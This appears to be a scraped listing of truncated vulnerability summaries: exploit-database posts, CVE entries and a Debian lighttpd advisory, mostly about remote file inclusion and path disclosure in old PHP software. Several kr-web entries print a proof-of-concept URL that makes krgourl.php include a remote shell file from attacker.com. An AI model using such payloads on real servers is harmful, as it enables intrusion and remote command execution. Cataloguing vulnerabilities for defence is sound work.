kr-web <= 1.1b2 - Remote File Inclusion Vulnerability

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web = 1.1b2 Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/krw/files/ Dork : dieHacking attempt; :D Vuln : ./KR-Web-1.1b2/adm/krgourl.php line 2 ?php include...

Gattaca Server 2003 Language Variable Path Exposure

No description provided by source. source: http://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error...

Gattaca Server 2003 Null Byte Path Disclosure

No description provided by source. source: http://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error...

Power BB 1.8.3 - Remote File Includes

No description provided by source. Dada?lar Grup Komutanl??? | HackSpy | Zombie | KroNickq | DigitALL | NoFearx38 | 1923Turk Grup by DigitALL Sites : http://powerwd.net Download : http://www.phpexplorer.com/Goster/536 Download : http://sourceforge.net/projects/pbb/ Power BB 1.8.3 Remote File...

Comus 2.0 Accept.PHP Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/23661/info Comus is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying...

Design/Logic Flaw

Mambo CMS 4.6.5 stores the MySQL database password in cleartext in the document root, which allows local users to obtain sensitive information via unspecified vectors...

Directory traversal

PHP-Fusion before 7.02.06 stores backup files with predictable filenames in an unrestricted directory under the web document root, which might allow remote attackers to obtain sensitive information via a direct request to the backup file in administration/dbbackups/...

[SECURITY] [DSA 2877-1] lighttpd security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2877-1 [email protected] http://www.debian.org/security/ Michael Gilbert March 12, 2014 http://www.debian.org/security/faq -...

Debian DSA-2877-1 : lighttpd - security update

Several vulnerabilities were discovered in the lighttpd web server. - CVE-2014-2323 Jann Horn discovered that specially crafted host names can be used to inject arbitrary MySQL queries in lighttpd servers using the MySQL virtual hosting module modmysqlvhost. This only affects installations with t...

[SECURITY] [DSA 2877-1] lighttpd security update

------------------------------------------------------------------------- Debian Security Advisory DSA-2877-1 [email protected] http://www.debian.org/security/ Michael Gilbert March 12, 2014 http://www.debian.org/security/faq -...

Debian Security Advisory DSA 2877-1 (lighttpd - security update)

Several vulnerabilities were discovered in the lighttpd web server. CVE-2014-2323 Jann Horn discovered that specially crafted host names can be used to inject arbitrary MySQL queries in lighttpd servers using the MySQL virtual hosting module modmysqlvhost. This only affects installations with the...

Improper access control

DFLabs PTK 1.0.5 stores data files with predictable names under the web document root with insufficient access control, which allows remote attackers to read logs, images, or reports via a direct request to the file in the 1 log, 2 images, or 3 report directory...

Apache Mixed Platform AddType Directive Information Disclosure

The remote host appears to be running Apache. When Apache runs on a Unix host with a document root on a Windows SMB share, remote, unauthenticated attackers could obtain the unprocessed contents of the directory. For example, requesting a PHP file with a trailing backslash could display the file'...

CVE-2010-2336

index.php in Yamamah Photo Gallery 1.00 allows remote attackers to obtain the source code of executable files within the web document root via the download parameter...

CVE-2010-2263

nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI...

Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability

Exploit for unknown platform in category web applications ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability ================================================== Automne.ws CMS 4.0.0rc2 Multiple RFI Vulnerability Created By 1nd0n3s14n l4m3r c --...

Power BB 1.8.3 - Remote File Inclusions

Power BB 1.8.3 - Remote File Inclusions Dada?lar Grup Komutanl??? | HackSpy | Zombie | KroNickq | DigitALL | NoFearx38 | 1923Turk Grup by DigitALL Sites : http://powerwd.net Download : http://www.phpexplorer.com/Goster/536 Download : http://sourceforge.net/projects/pbb/ Power BB 1.8.3 Remote File...

kr-web 1.1b2 - Remote File Inclusion

kr-web 1.1b2 - Remote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://server/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I...

kr-web 1.1b2 - Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://server/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I Love U Full : /\ all member at...

KR-Web 1.1b2 Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://0wn3d.com/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I Love U Full : /\ all member at...